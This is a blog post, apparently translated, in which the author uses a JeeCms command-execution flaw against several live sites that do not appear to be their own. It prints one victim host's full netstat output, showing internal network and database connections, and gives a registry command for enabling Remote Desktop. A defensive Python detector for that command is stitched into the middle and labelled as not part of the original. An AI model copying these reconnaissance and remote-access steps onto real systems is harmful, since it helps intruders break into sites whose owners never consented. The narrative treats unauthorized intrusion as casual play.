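Playing around with the JeeCms command execution vulnerability

First site

First I looked at the system info: it is running with administrator privileges (it seems this kind of command execution vulnerability always gets administrator privileges...)

[Image 1]


Next, I checked whether 3389 was open...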

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1028           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5631           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:6666           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:7777           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8009           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8010           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8090           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8100           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:9089           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:2891         127.0.0.1:8100         LAST_ACK
  TCP    127.0.0.1:3171         127.0.0.1:8100         LAST_ACK
  TCP    127.0.0.1:4391         127.0.0.1:8100         TIME_WAIT
  TCP    127.0.0.1:4400         127.0.0.1:8100         ESTABLISHED
  TCP    127.0.0.1:8006         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8012         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8100         127.0.0.1:4400         ESTABLISHED
  TCP    192.168.5.41:80        172.18.10.2:41405      ESTABLISHED
  TCP    192.168.5.41:80        172.18.10.2:41980      TIME_WAIT
  TCP    192.168.5.41:139       0.0.0.0:0              LISTENING
  TCP    192.168.5.41:3241      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3242      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3243      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3244      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3245      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3246      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3247      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3248      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3249      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3250      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3251      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3252      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3253      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3254      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3255      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3256      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3257      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3258      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3259      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3260      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3261      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3262      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3263      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3264      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3265      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3267      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3268      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3269      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3270      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3271      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3272      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3273      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3274      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3275      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3276      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3277      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3278      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3279      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3280      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3281      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3282      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3283      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3284      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3285      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3286      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3287      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3288      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3289      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3290      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3291      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3292      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3293      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3294      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3295      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3296      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3297      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3298      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3299      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3300      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3301      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3303      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3304      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3305      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3306      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3307      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3308      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3309      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3310      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3311      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3312      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3313      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3314      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3315      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3316      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3317      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3318      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3319      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3320      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3321      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3322      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:4399      192.168.1.30:41001     SYN_SENT
  TCP    *.*.*.*:139    0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*                    
  UDP    0.0.0.0:5632           *:*                    
  UDP    127.0.0.1:123          *:*                    
  UDP    127.0.0.1:1031         *:*                    
  UDP    127.0.0.1:1087         *:*                    
  UDP    192.168.5.41:123       *:*                    
  UDP    192.168.5.41:137       *:*                    
  UDP    192.168.5.41:138       *:*                    
  UDP    *.*.*.*:123            *:*                    
  UDP    *.*.*.*:137            *:*                                     

As it turned out, 3389 was not open...

I tried opening 3389 with a registry command...


REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
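
A defender-side check for the registry change above, as an added example that is not part of the original post: it flags process-creation command lines that run `reg add` to set `fDenyTSConnections` to 0, stripping quotes first so the `Terminal" "Server` spelling used above still matches. The event tuples, the servlet-container image names and the severity labels are assumptions made for the illustration.

```python
import re

KEY_TAIL = r"control\terminal server"   # tail of the registry key used on the page
VALUE = "fdenytsconnections"            # 0 = RDP allowed, 1 = RDP refused
# Assumed image-name fragments for a Java servlet container hosting the CMS.
WEB_PARENTS = ("java.exe", "javaw.exe", "tomcat")

def normalize(cmdline):
    """Lower-case, drop quotes and carets, collapse whitespace, so that
    Terminal" "Server compares equal to "Terminal Server"."""
    s = cmdline.lower().replace('"', "").replace("^", "")
    return re.sub(r"\s+", " ", s).strip()

def enables_rdp(cmdline):
    """True for a `reg add` that sets fDenyTSConnections to zero."""
    s = normalize(cmdline)
    if not re.search(r"\breg(\.exe)? add\b", s):
        return False
    if KEY_TAIL not in s or not re.search(r"/v " + VALUE + r"\b", s):
        return False
    m = re.search(r"/d (0x[0-9a-f]+|\d+)\b", s)
    if not m:
        return False
    raw = m.group(1)
    return (int(raw, 16) if raw.startswith("0x") else int(raw)) == 0

def triage(events):
    """events: iterable of (parent_image, cmdline). Returns (severity, cmdline) hits.
    A web-server parent raises severity: the change came through the application."""
    hits = []
    for parent, cmdline in events:
        if enables_rdp(cmdline):
            from_web = any(p in parent.lower() for p in WEB_PARENTS)
            hits.append(("high" if from_web else "medium", cmdline))
    return hits

# Constructed sample process-creation events (not taken from a real log).
SAMPLE = [
    (r"C:\tomcat\bin\tomcat6.exe",
     r'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'),
    (r"C:\Windows\explorer.exe",
     r'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f'),
    (r"C:\Windows\explorer.exe",
     r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f'),
    (r"C:\tomcat\bin\tomcat6.exe",
     r'reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections'),
]

if __name__ == "__main__":
    for severity, cmd in triage(SAMPLE):
        print(severity, cmd)
```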

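However, it did not succeed... ipconfig showed the host is on an internal network... I had wanted to set up a forward... but I could not upload anything

So I gave up (that's right, I am exactly the kind of person who quits halfway)


The second site, surprisingly, was running FreeBSD... impressive...

[Image 2]


However, executing commands returned no output at all... and uploading anything returned 500...

Third site

They are not that easy to find... so... I got nothing done... I just got a taste of command execution, lol


Of course, I did find one very interesting thing

[Image 3]

This is what shows up in whatcms, haha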
